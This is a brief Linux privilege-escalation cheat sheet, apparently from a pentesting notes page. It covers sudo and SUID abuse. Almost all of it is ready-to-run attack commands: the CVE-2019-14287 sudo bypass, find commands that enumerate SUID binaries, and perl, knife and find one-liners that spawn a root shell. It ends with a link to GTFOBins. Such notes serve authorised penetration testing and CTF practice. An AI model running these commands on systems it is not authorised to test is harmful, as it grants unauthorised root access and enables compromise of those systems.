Sudo / SUID (Set User ID)

Sudo

sudo -l

CVE-2019–14287

# sudo <= 1.8.27
sudo -V
sudo -u#-1 /bin/bash

SUID (Set User ID)

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

Perl

sudo /usr/bin/perl -e 'exec "/bin/bash"'
/usr/bin/perl -e '$ENV{"PATH"} = "/usr/bin"; exec "/bin/bash -p"'

knife

sudo /usr/bin/knife exec -E "system('/bin/bash')"

find

# Sudo
sudo /usr/bin/find . -exec /bin/sh \; -quit
# SUID
find . -exec /bin/sh -p \; -quit

GTFOBins

https://gtfobins.github.io/

Última actualización